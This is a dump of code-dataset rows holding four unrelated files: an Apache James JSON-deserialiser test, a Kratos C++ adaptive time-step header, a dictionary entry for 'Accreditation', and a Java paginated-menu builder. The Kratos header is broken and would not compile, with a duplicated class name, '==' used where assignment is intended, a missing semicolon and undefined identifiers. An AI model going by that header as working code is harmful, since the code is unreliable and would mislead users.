max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
634
/**************************************************************** * Licensed to the Apache Software Foundation (ASF) under one * * or more contributor license agreements. See the NOTICE file * * distributed with this work for additional information * * regarding copyright ownership. The ASF licenses this file * * to you under the Apache License, Version 2.0 (the * * "License"); you may not use this file except in compliance * * with the License. You may obtain a copy of the License at * * * * http://www.apache.org/licenses/LICENSE-2.0 * * * * Unless required by applicable law or agreed to in writing, * * software distributed under the License is distributed on an * * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * * KIND, either express or implied. See the License for the * * specific language governing permissions and limitations * * under the License. * ****************************************************************/ package org.apache.james.vault.dto.query; import static org.apache.james.vault.DeletedMessageFixture.SUBJECT; import static org.apache.mailet.base.MailAddressFixture.SENDER; import static org.assertj.core.api.Assertions.assertThat; import org.apache.james.vault.search.FieldName; import org.apache.james.vault.search.Operator; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import com.fasterxml.jackson.databind.ObjectMapper; class QueryElementDeserializerTest { private ObjectMapper objectMapper; @BeforeEach void beforeEach() { objectMapper = new ObjectMapper(); } @Test void shouldDeserializeNestedStructure() throws Exception { String queryJson = "{ " + " \"combinator\": \"and\", " + " \"criteria\": [ " + " { " + " \"combinator\": \"and\", " + " \"criteria\": [ " + " {\"fieldName\": \"subject\", \"operator\": \"contains\", \"value\": \"" + SUBJECT + "\"}," + " {\"fieldName\": \"sender\", \"operator\": \"equals\", \"value\": \"" + SENDER.asString() + "\"}" + " ] " + " }, " + " {\"fieldName\": \"hasAttachment\", \"operator\": \"equals\", \"value\": \"true\"}" + " ] " + "} "; QueryDTO queryDTO = objectMapper.readValue(queryJson, QueryDTO.class); assertThat(queryDTO) .isEqualTo(QueryDTO.and( QueryDTO.and( CriterionDTO.from(FieldName.SUBJECT, Operator.CONTAINS, SUBJECT), CriterionDTO.from(FieldName.SENDER, Operator.EQUALS, SENDER.asString())), CriterionDTO.from(FieldName.HAS_ATTACHMENT, Operator.EQUALS, "true") )); } @Test void shouldDeserializeFlattenStructure() throws Exception { String queryJson = "{ " + " \"combinator\": \"and\", " + " \"criteria\": [ " + " {\"fieldName\": \"subject\", \"operator\": \"contains\", \"value\": \"" + SUBJECT + "\"}," + " {\"fieldName\": \"sender\", \"operator\": \"equals\", \"value\": \"" + SENDER.asString() + "\"}," + " {\"fieldName\": \"hasAttachment\", \"operator\": \"equals\", \"value\": \"true\"}" + " ] " + "} "; QueryDTO queryDTO = objectMapper.readValue(queryJson, QueryDTO.class); assertThat(queryDTO) .isEqualTo(QueryDTO.and( CriterionDTO.from(FieldName.SUBJECT, Operator.CONTAINS, SUBJECT), CriterionDTO.from(FieldName.SENDER, Operator.EQUALS, SENDER.asString()), CriterionDTO.from(FieldName.HAS_ATTACHMENT, Operator.EQUALS, "true") )); } }
1,788
778
<filename>applications/SolidMechanicsApplication/custom_processes/time_discretization_process.hpp // // Project Name: KratosSolidMechanicsApplication $ // Created by: $Author: JMCarbonell $ // Last modified by: $Co-Author: $ // Date: $Date: September 2018 $ // Revision: $Revision: 0.0 $ // // #if !defined(KRATOS_TIME_DISCRETIZATION_PROCESS_H_INCLUDED ) #define KRATOS_TIME_DISCRETIZATION_PROCESS_H_INCLUDED // System includes // External includes // Project includes #include "includes/model_part.h" #include "utilities/openmp_utils.h" #include "geometries/triangle_2d_3.h" #include "geometries/triangle_2d_6.h" #include "geometries/tetrahedra_3d_4.h" #include "geometries/tetrahedra_3d_10.h" #include "processes/process.h" namespace Kratos { ///@name Kratos Globals ///@{ ///@} ///@name Type Definitions ///@{ typedef ModelPart::NodesContainerType NodesContainerType; typedef ModelPart::ElementsContainerType ElementsContainerType; typedef ModelPart::MeshType::GeometryType::PointsArrayType PointsArrayType; typedef GlobalPointersVector<Node<3> > NodeWeakPtrVectorType; typedef GlobalPointersVector<Element> ElementWeakPtrVectorType; typedef GlobalPointersVector<Condition> ConditionWeakPtrVectorType; ///@} ///@name Enum's ///@{ ///@} ///@name Functions ///@{ ///@} ///@name Kratos Classes ///@{ /// Short class definition. /** Detail class definition. */ class TimeDiscretizationProcessTimeDiscretizationProcess : public Process { public: ///@name Type Definitions ///@{ /// Pointer definition of TimeDiscretizationProcess KRATOS_CLASS_POINTER_DEFINITION( TimeDiscretizationProcess ); ///@} ///@name Life Cycle ///@{ /// Default constructor. TimeDiscretizationProcess(ModelPart& rModelPart) : mrModelPart(rModelPart) { } /// Default constructor. TimeDiscretizationProcess(ModelPart& rModelPart, Parameters rParameters) : Process(Flags()) , mrModelPart(rModelPart) { KRATOS_TRY Parameters default_parameters( R"( { "model_part_name":"MODEL_PART_NAME", "start_time": 0, "end_time": 1, "time_step": 1, "prediction_level": -1, "increase_factor": 2, "decrease_factor": 2, "steps_update_delay": 4 } )" ); // Validate against defaults -- this ensures no type mismatch rParameters.ValidateAndAssignDefaults(default_parameters); mTime.Initialize(rParameters["time_step"].GetDouble(), rParameters["start_time"].GetDouble(), rParameters["end_time"].GetDouble()); mTime.SetFactors(rParameters["increase_factor"].GetDouble(), rParameters["decrease_factor"].GetDouble(), rParameters["steps_update_delay"]); mTime.PredictionLevel = rParameters["prediction_level"].GetInt(); } /// Destructor. virtual ~TimeDiscretizationProcess() { } void operator()() { Execute(); } ///@} ///@name Operations ///@{ void Execute() override { KRATOS_TRY ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); if(!rCurrentProcessInfo[CONVERGENCE_ACHIEVED]) { this->ReduceTimeStep(); } else{ this->UpdateTimeStep(); } rCurrentProcessInfo[TIME] += mTime.CurrentStep; rCurrentProcessInfo[STEP] += 1; // it sets TIME and DELTA_TIME internally and Clones the SolutionStepData and ProcessInfo buffers mrModelPart.CloneTimeStep(rCurrentProcessInfo[TIME]); // update total time mTime.Total = rCurrentProcessInfo[TIME]; KRATOS_CATCH(""); } // Deprecated methods: // void PreExecute() // { // KRATOS_TRY // const double initialTimeInterval = rCurrentProcessInfo[INITIAL_DELTA_TIME]; // const double currentTimeInterval = rCurrentProcessInfo[CURRENT_DELTA_TIME]; // double updatedTime = rCurrentProcessInfo[TIME]; // double updatedTimeInterval = rCurrentProcessInfo[DELTA_TIME]; // double deltaTimeToNewMilestone = initialTimeInterval; // double minimumTimeInterval = initialTimeInterval*0.0001; // rCurrentProcessInfo.SetValue(PREVIOUS_DELTA_TIME,currentTimeInterval); // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,false); // bool milestoneTimeReached=true; // bool increaseTimeInterval=true; // bool timeIntervalReduced=false; // double tolerance=0.0001; // updatedTime -= initialTimeInterval; // unsigned int previousMilestoneStep=updatedTime/initialTimeInterval; // deltaTimeToNewMilestone=initialTimeInterval*(previousMilestoneStep+1)-updatedTime; // updatedTimeInterval =currentTimeInterval; // bool badVelocityConvergence=rCurrentProcessInfo[BAD_VELOCITY_CONVERGENCE]; // bool badPressureConvergence=rCurrentProcessInfo[BAD_PRESSURE_CONVERGENCE]; // if(updatedTimeInterval<2.0*minimumTimeInterval && mEchoLevel > 0 && mrModelPart.GetCommunicator().MyPID() == 0){ // std::cout<<"ATTENTION! time step much smaller than initial time step, I'll not reduce it"<<std::endl; // } // if((badPressureConvergence==true || badVelocityConvergence==true) && updatedTimeInterval>(2.0*minimumTimeInterval)){ // updatedTimeInterval *=0.5; // /* std::cout<<"reducing time step (bad convergence at the previous step)"<<updatedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // timeIntervalReduced=true; // } // if(deltaTimeToNewMilestone<(1.0+tolerance)*updatedTimeInterval && deltaTimeToNewMilestone>initialTimeInterval*tolerance){ // rCurrentProcessInfo.SetValue(DELTA_TIME,deltaTimeToNewMilestone); // if(deltaTimeToNewMilestone<0.75*updatedTimeInterval){ // timeIntervalReduced=true; // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // } // updatedTimeInterval =deltaTimeToNewMilestone; // milestoneTimeReached=true; // }else{ // milestoneTimeReached=false; // rCurrentProcessInfo.SetValue(DELTA_TIME,updatedTimeInterval); // } // if(timeIntervalReduced==false){ // if(updatedTimeInterval>(2.0*minimumTimeInterval)){ // const unsigned int dimension = mrModelPart.ElementsBegin()->GetGeometry().WorkingSpaceDimension(); // if(dimension==2){ // CheckNodalConditionForTimeStepReduction(updatedTimeInterval,increaseTimeInterval,timeIntervalReduced); // if(timeIntervalReduced==false){ // CheckElementalConditionForTimeStepReduction(increaseTimeInterval); // } // } // } // // if(increaseTimeInterval==true && initialTimeInterval>(1.0+tolerance)*updatedTimeInterval && badPressureConvergence==false && badVelocityConvergence==false ){ // if(increaseTimeInterval==true && initialTimeInterval>(1.0+tolerance)*updatedTimeInterval && badVelocityConvergence==false ){ // IncreaseTimeInterval(updatedTimeInterval,deltaTimeToNewMilestone,tolerance,increaseTimeInterval); // } // else{ // increaseTimeInterval=false; // } // } // double newTimeInterval = rCurrentProcessInfo[DELTA_TIME]; // double milestoneGap=fabs(newTimeInterval-deltaTimeToNewMilestone); // if(milestoneGap<0.49*newTimeInterval && milestoneTimeReached==false){ // /* std::cout<<"the milestone is very close, I add "<<milestoneGap<<" to "<<newTimeInterval<<std::endl;*/ // newTimeInterval+=milestoneGap; // rCurrentProcessInfo.SetValue(DELTA_TIME,newTimeInterval); // milestoneTimeReached=true; // } // updatedTime+=newTimeInterval; // rCurrentProcessInfo.SetValue(TIME,updatedTime); // rCurrentProcessInfo.SetValue(CURRENT_DELTA_TIME,newTimeInterval); // /* if(newTimeInterval<(0.49*currentTimeInterval)){ */ // /* std::cout<<"ATTENTION! new time step is more than 2 times smaller than the previous one"<<std::endl; */ // /* } */ // if(increaseTimeInterval==false && milestoneTimeReached==true && fabs(newTimeInterval-initialTimeInterval)>tolerance && !(deltaTimeToNewMilestone>newTimeInterval*(1.0+tolerance))){ // rCurrentProcessInfo.SetValue(CURRENT_DELTA_TIME,currentTimeInterval); // } // if (newTimeInterval<initialTimeInterval){ // std::cout<<"current time "<<updatedTime<<" time step: new "<<newTimeInterval<<" previous "<<currentTimeInterval<<" initial "<<initialTimeInterval<<"\n"<<std::endl; // } // KRATOS_CATCH(""); // }; // void CheckNodalConditionForTimeStepReduction(double updatedTimeInterval, // bool &increaseTimeInterval, // bool &timeIntervalReduced) // { // ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); // #pragma omp parallel // { // ModelPart::NodeIterator NodeBegin; // ModelPart::NodeIterator NodeEnd; // OpenMPUtils::PartitionedIterators(mrModelPart.Nodes(),NodeBegin,NodeEnd); // for (ModelPart::NodeIterator itNode = NodeBegin; itNode != NodeEnd; ++itNode) // { // if(itNode->IsNot(TO_ERASE) && itNode->IsNot(ISOLATED) && itNode->IsNot(SOLID)){ // const array_1d<double,3> &Vel = itNode->FastGetSolutionStepValue(VELOCITY); // double NormVelNode=0; // for (unsigned int d = 0; d < 3; ++d){ // NormVelNode+=Vel[d] * Vel[d]; // } // double motionInStep=sqrt(NormVelNode)*updatedTimeInterval; // double unsafetyFactor=0; // NodeWeakPtrVectorType& neighb_nodes = itNode->GetValue(NEIGHBOUR_NODES); // for (NodeWeakPtrVectorType::iterator nn = neighb_nodes.begin();nn != neighb_nodes.end(); ++nn) // { // array_1d<double,3> CoorNeighDifference=itNode->Coordinates()-nn->Coordinates(); // double squaredDistance=0; // for (unsigned int d = 0; d < 3; ++d){ // squaredDistance+=CoorNeighDifference[d]*CoorNeighDifference[d]; // } // double nodeDistance=sqrt(squaredDistance); // double tempUnsafetyFactor=motionInStep/nodeDistance; // if(tempUnsafetyFactor>unsafetyFactor){ // unsafetyFactor=tempUnsafetyFactor; // } // } // if(unsafetyFactor>0.35){ // increaseTimeInterval=false; // if(unsafetyFactor>1.0){ // double temporaryTimeInterval = rCurrentProcessInfo[DELTA_TIME]; // double reducedTimeInterval=0.5*updatedTimeInterval; // if(reducedTimeInterval<temporaryTimeInterval){ // rCurrentProcessInfo.SetValue(DELTA_TIME,reducedTimeInterval); // /* std::cout<<"reducing time step (nodal criterion)"<<reducedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // timeIntervalReduced=true; // break; // } // } // } // } // } // } // } // void CheckElementalConditionForTimeStepReduction(bool &increaseTimeInterval) // { // ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); // #pragma omp parallel // { // ModelPart::ElementIterator ElemBegin; // ModelPart::ElementIterator ElemEnd; // OpenMPUtils::PartitionedIterators(mrModelPart.Elements(),ElemBegin,ElemEnd); // for ( ModelPart::ElementIterator itElem = ElemBegin; itElem != ElemEnd; ++itElem ) // { // double temporaryTimeInterval=rCurrentProcessInfo[DELTA_TIME]; // double currentElementalArea = 0; // const unsigned int dimension = (itElem)->GetGeometry().WorkingSpaceDimension(); // if(dimension==2){ // currentElementalArea = (itElem)->GetGeometry().Area(); // Geometry<Node<3> > updatedElementCoordinates; // bool solidElement=false; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // if(itElem->GetGeometry()[i].Is(SOLID) || itElem->GetGeometry()[i].Is(TO_ERASE) || itElem->IsNot(ACTIVE)){ // solidElement=true; // } // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval; // updatedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // double newArea=0; // if(itElem->GetGeometry().size()==3){ // Triangle2D3<Node<3> > myGeometry(updatedElementCoordinates); // newArea=myGeometry.Area(); // }else if(itElem->GetGeometry().size()==6){ // Triangle2D6<Node<3> > myGeometry(updatedElementCoordinates); // newArea=myGeometry.Area(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(solidElement==true){ // newArea=currentElementalArea; // } // if(newArea<0.001*currentElementalArea && currentElementalArea>0){ // double reducedTimeInterval=0.5*temporaryTimeInterval; // if(reducedTimeInterval<temporaryTimeInterval){ // rCurrentProcessInfo.SetValue(DELTA_TIME,reducedTimeInterval); // /* std::cout<<"reducing time step (elemental inversion)"<<reducedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // increaseTimeInterval=false; // break; // } // }else{ // Geometry<Node<3> > updatedEnlargedElementCoordinates; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval*2.5; // updatedEnlargedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // if(itElem->GetGeometry().size()==3){ // Triangle2D3<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newArea=myGeometry.Area(); // }else if(itElem->GetGeometry().size()==6){ // Triangle2D6<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newArea=myGeometry.Area(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(newArea<0.001*currentElementalArea && currentElementalArea>0){ // increaseTimeInterval=false; // /* std::cout<<"I'll not reduce the time step but I'll not allow to increase it"<<std::endl; */ // } // } // } // else if(dimension==3){ // double currentElementalVolume = (itElem)->GetGeometry().Volume(); // Geometry<Node<3> > updatedElementCoordinates; // bool solidElement=false; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // if(itElem->GetGeometry()[i].Is(SOLID) || itElem->IsNot(ACTIVE)){ // solidElement=true; // } // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval; // updatedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // double newVolume=0; // if(itElem->GetGeometry().size()==4){ // Tetrahedra3D4<Node<3> > myGeometry(updatedElementCoordinates); // newVolume=myGeometry.Volume(); // }else if(itElem->GetGeometry().size()==10){ // Tetrahedra3D10<Node<3> > myGeometry(updatedElementCoordinates); // newVolume=myGeometry.Volume(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(solidElement==true){ // newVolume=currentElementalVolume; // } // if(newVolume<0.001*currentElementalVolume && currentElementalVolume>0){ // double reducedTimeInterval=0.5*temporaryTimeInterval; // if(reducedTimeInterval<temporaryTimeInterval){ // rCurrentProcessInfo.SetValue(DELTA_TIME,reducedTimeInterval); // /* std::cout<<"reducing time step (elemental inversion)"<<reducedTimeInterval<<std::endl; */ // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // increaseTimeInterval=false; // break; // } // }else{ // Geometry<Node<3> > updatedEnlargedElementCoordinates; // for(unsigned int i=0; i<itElem->GetGeometry().size(); ++i) // { // const array_1d<double,3> &Vel = itElem->GetGeometry()[i].FastGetSolutionStepValue(VELOCITY); // Point updatedNodalCoordinates=itElem->GetGeometry()[i].Coordinates()+Vel*temporaryTimeInterval*2.5; // updatedEnlargedElementCoordinates.push_back(Kratos::make_shared<Node<3> >(i,updatedNodalCoordinates.X(),updatedNodalCoordinates.Y(),updatedNodalCoordinates.Z())); // } // if(itElem->GetGeometry().size()==4){ // Tetrahedra3D4<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newVolume=myGeometry.Volume(); // }else if(itElem->GetGeometry().size()==10){ // Tetrahedra3D10<Node<3> > myGeometry(updatedEnlargedElementCoordinates); // newVolume=myGeometry.Volume(); // }else{ // std::cout<<"GEOMETRY NOT DEFINED"<<std::endl; // } // if(newVolume<0.001*currentElementalVolume && currentElementalVolume>0){ // increaseTimeInterval=false; // /* std::cout<<"I'll not reduce the time step but I'll not allow to increase it"<<std::endl; */ // } // } // } // } // } // } // void IncreaseTimeInterval(double updatedTimeInterval, // double deltaTimeToNewMilestone, // double tolerance, // bool &increaseTimeInterval) // { // ProcessInfo& rCurrentProcessInfo = mrModelPart.GetProcessInfo(); // double increasedTimeInterval = 2.0 * updatedTimeInterval; // if(increasedTimeInterval<deltaTimeToNewMilestone*(1.0+tolerance)) // { // rCurrentProcessInfo.SetValue(DELTA_TIME,increasedTimeInterval); // rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED,true); // } // else{ // increaseTimeInterval=false; // } // } ///@} ///@name Operators ///@{ ///@} ///@name Access ///@{ ///@} ///@name Inquiry ///@ ///@} ///@name Input and output ///@{ /// Turn back information as a string. std::string Info() const override { return "TimeDiscretizationProcess"; } /// Print information about this object. void PrintInfo(std::ostream& rOStream) const override { rOStream << "TimeDiscretizationProcess"; } protected: ///@name Protected static Member Variables ///@{ ///@} ///@name Protected member Variables ///@{ struct TimeParameters { int PredictionLevel; double InitialStep; double PreviousStep; double CurrentStep; double PredictedStep; double Total; double Start; double End; double MileStone; double IncreaseFactor; double DecreaseFactor; int UpdateDelay; int DelayCounter; void Initialize(const double& rTimeStep, const double& rStartTime, const double& rEndTime) { Predict = false; PredictionLevel = 0; InitialStep = rTimeStep; PreviousStep = rTimeStep; CurrentStep = rTimeStep; Start = rStartTime; End = rEndTime; MileStone = rTimeStep+rTimeStep; } void SetFactors(const double& rIncreaseFactor, const double& rDecreaseFactor, const double& rDelay) { IncreaseFactor = rIncreaseFactor; DecreaseFactor = rDecreaseFactor; UpdateDelay = rDelay; } bool Increase() { if( !ActiveDelay() ){ PreviousStep = CurrentStep; CurrentStep = PreviousStep + IncreaseFactor; if( InitialStep <= CurrentStep ) CurrentStep == InitialStep; if( Total+CurrentStep >= MileStone ){ CurrentStep == MileStone-Total; MileStone += InitialStep; } } return CheckSameTime(PreviousStep, CurrentStep); } bool Decrease() { if( !ActiveDelay() ){ PreviousStep = CurrentStep; CurrentStep = PreviousStep - DecreaseFactor; if( CurrentStep <= 1e-2*InitialStep ) CurrentStep = 1e-2*InitialStep; } return CheckSameTime(PreviousStep, CurrentStep); } bool PredictActive() { if( PredictionLevel >= 0) { if( PredictionLevel == 0 && Total > Start ) return false; else return true; } } bool Update() { if( PredictedStep > CurrentStep ) return Increase(); else return Decrease(); } bool ActiveDelay() { if( DelayCounter == UpdateDelay ) { DelayCounter = 0; return false; } else{ ++DelayCounter; return true; } } bool CheckSameTime(const double& rTime, const double& rNewTime) { double tolerance = Initial * 1e-5; if( rNewTime > rTime-tolerance && rNewTime < rTime+tolerance ) return true; else return false; } } ///@} ///@name Protected Operators ///@{ ///@} ///@name Protected Operations ///@{ void ReduceTimeStep() { KRATOS_TRY rCurrentProcessInfo[TIME] -= mTime.CurrentStep; rCurrentProcessInfo[STEP] -= 1; mrModelPart.ReduceTimeStep(rCurrentProcessInfo[TIME]); rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED, mTime.Decrease()); KRATOS_CATCH(""); } void UpdateTimeStep() { KRATOS_TRY this->PredictTimeStep(); rCurrentProcessInfo.SetValue(DELTA_TIME_CHANGED, mTime.Update()); KRATOS_CATCH(""); } void PredictTimeStep() { KRATOS_TRY if( mTime.PredictActive() ){ this->PredictTimeStep(mTime.PredictedStep); } KRATOS_CATCH(""); } void PredictTimeStep(double& rTimeStep) { KRATOS_TRY KRATOS_CATCH(""); } void CheckCriticalElement() { KRATOS_TRY KRATOS_CATCH(""); } ///@} ///@name Protected Access ///@{ ///@} ///@name Protected Inquiry ///@{ ///@} ///@name Protected LifeCycle ///@{ ///@} private: ///@name Private Static Member Variables ///@{ ModelPart& mrModelPart; TimeParameters mTime; ///@} ///@name Private Member Variables ///@{ ///@} ///@name Private Operators ///@{ ///@} ///@name Private Operations ///@{ ///@} ///@name Private Access ///@{ ///@} ///@name Private Inquiry ///@{ ///@} ///@name Un accessible methods ///@{ /// Assignment operator. TimeDiscretizationProcess& operator=(TimeDiscretizationProcess const& rOther); /// Copy constructor. //TimeDiscretizationProcess(TimeDiscretizationProcess const& rOther); ///@} }; // Class TimeDiscretizationProcess ///@} ///@name Type Definitions ///@{ ///@} ///@name Input and output ///@{ /// input stream function inline std::istream& operator >> (std::istream& rIStream, TimeDiscretizationProcess& rThis); /// output stream function inline std::ostream& operator << (std::ostream& rOStream, const TimeDiscretizationProcess& rThis) { rThis.PrintInfo(rOStream); rOStream << std::endl; rThis.PrintData(rOStream); return rOStream; } ///@} } // namespace Kratos. #endif // KRATOS_TIME_DISCRETIZATION_PROCESS_H_INCLUDED defined
10,687
335
<filename>A/Accreditation_noun.json { "word": "Accreditation", "definitions": [ "The action or process of officially recognizing someone as having a particular status or being qualified to perform a particular activity.", "Official certification that a school or course has met standards set by external regulators.", "An acknowledgement of a person's responsibility for or achievement of something." ], "parts-of-speech": "Noun" }
133
355
/* * This file is part of helper, licensed under the MIT License. * * Copyright (c) lucko (Luck) <<EMAIL>> * Copyright (c) contributors * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ package me.lucko.helper.menu.paginated; import com.google.common.collect.ImmutableList; import me.lucko.helper.item.ItemStackBuilder; import me.lucko.helper.menu.Item; import me.lucko.helper.menu.scheme.MenuScheme; import me.lucko.helper.menu.scheme.StandardSchemeMappings; import me.lucko.helper.utils.annotation.NonnullByDefault; import org.bukkit.Material; import org.bukkit.entity.Player; import org.bukkit.inventory.ItemStack; import java.util.List; import java.util.Objects; import java.util.function.Function; /** * Specification class for a {@link PaginatedGui}. */ @NonnullByDefault public class PaginatedGuiBuilder { public static final int DEFAULT_LINES = 6; public static final int DEFAULT_NEXT_PAGE_SLOT = new MenuScheme() .maskEmpty(5) .mask("000000010") .getMaskedIndexes().get(0); public static final int DEFAULT_PREVIOUS_PAGE_SLOT = new MenuScheme() .maskEmpty(5) .mask("010000000") .getMaskedIndexes().get(0); public static final List<Integer> DEFAULT_ITEM_SLOTS = new MenuScheme() .mask("011111110") .mask("011111110") .mask("011111110") .mask("011111110") .mask("011111110") .getMaskedIndexesImmutable(); public static final MenuScheme DEFAULT_SCHEME = new MenuScheme(StandardSchemeMappings.STAINED_GLASS) .mask("100000001") .mask("100000001") .mask("100000001") .mask("100000001") .mask("100000001") .mask("100000001") .scheme(3, 3) .scheme(3, 3) .scheme(3, 3) .scheme(3, 3) .scheme(3, 3) .scheme(3, 3); public static final Function<PageInfo, ItemStack> DEFAULT_NEXT_PAGE_ITEM = pageInfo -> ItemStackBuilder.of(Material.ARROW) .name("&b&m--&b>") .lore("&fSwitch to the next page.") .lore("") .lore("&7Currently viewing page &b" + pageInfo.getCurrent() + "&7/&b" + pageInfo.getSize()) .build(); public static final Function<PageInfo, ItemStack> DEFAULT_PREVIOUS_PAGE_ITEM = pageInfo -> ItemStackBuilder.of(Material.ARROW) .name("&b<&b&m--") .lore("&fSwitch to the previous page.") .lore("") .lore("&7Currently viewing page &b" + pageInfo.getCurrent() + "&7/&b" + pageInfo.getSize()) .build(); public static PaginatedGuiBuilder create() { return new PaginatedGuiBuilder(); } private int lines; private String title; private List<Integer> itemSlots; private int nextPageSlot; private int previousPageSlot; private MenuScheme scheme; private Function<PageInfo, ItemStack> nextPageItem; private Function<PageInfo, ItemStack> previousPageItem; private PaginatedGuiBuilder() { this.lines = DEFAULT_LINES; this.itemSlots = DEFAULT_ITEM_SLOTS; this.nextPageSlot = DEFAULT_NEXT_PAGE_SLOT; this.previousPageSlot = DEFAULT_PREVIOUS_PAGE_SLOT; this.scheme = DEFAULT_SCHEME; this.nextPageItem = DEFAULT_NEXT_PAGE_ITEM; this.previousPageItem = DEFAULT_PREVIOUS_PAGE_ITEM; } public PaginatedGuiBuilder copy() { PaginatedGuiBuilder copy = new PaginatedGuiBuilder(); copy.lines = this.lines; copy.title = this.title; copy.itemSlots = this.itemSlots; copy.nextPageSlot = this.nextPageSlot; copy.previousPageSlot = this.previousPageSlot; copy.scheme = this.scheme.copy(); copy.nextPageItem = this.nextPageItem; copy.previousPageItem = this.previousPageItem; return copy; } public PaginatedGuiBuilder lines(int lines) { this.lines = lines; return this; } public PaginatedGuiBuilder title(String title) { this.title = title; return this; } public PaginatedGuiBuilder itemSlots(List<Integer> itemSlots) { this.itemSlots = ImmutableList.copyOf(itemSlots); return this; } public PaginatedGuiBuilder nextPageSlot(int nextPageSlot) { this.nextPageSlot = nextPageSlot; return this; } public PaginatedGuiBuilder previousPageSlot(int previousPageSlot) { this.previousPageSlot = previousPageSlot; return this; } public PaginatedGuiBuilder scheme(MenuScheme scheme) { this.scheme = Objects.requireNonNull(scheme, "scheme"); return this; } public PaginatedGuiBuilder nextPageItem(Function<PageInfo, ItemStack> nextPageItem) { this.nextPageItem = Objects.requireNonNull(nextPageItem, "nextPageItem"); return this; } public PaginatedGuiBuilder previousPageItem(Function<PageInfo, ItemStack> previousPageItem) { this.previousPageItem = Objects.requireNonNull(previousPageItem, "previousPageItem"); return this; } public int getLines() { return this.lines; } public String getTitle() { return this.title; } public List<Integer> getItemSlots() { return this.itemSlots; } public int getNextPageSlot() { return this.nextPageSlot; } public int getPreviousPageSlot() { return this.previousPageSlot; } public MenuScheme getScheme() { return this.scheme; } public Function<PageInfo, ItemStack> getNextPageItem() { return this.nextPageItem; } public Function<PageInfo, ItemStack> getPreviousPageItem() { return this.previousPageItem; } public PaginatedGui build(Player player, Function<PaginatedGui, List<Item>> content) { Objects.requireNonNull(player, "player"); Objects.requireNonNull(content, "content"); Objects.requireNonNull(this.lines, "lines"); Objects.requireNonNull(this.title, "title"); Objects.requireNonNull(this.itemSlots, "itemSlots"); Objects.requireNonNull(this.nextPageSlot, "nextPageSlot"); Objects.requireNonNull(this.previousPageSlot, "previousPageSlot"); Objects.requireNonNull(this.scheme, "scheme"); Objects.requireNonNull(this.nextPageItem, "nextPageItem"); Objects.requireNonNull(this.previousPageItem, "previousPageItem"); return new PaginatedGui(content, player, this); } }
3,030
6,098
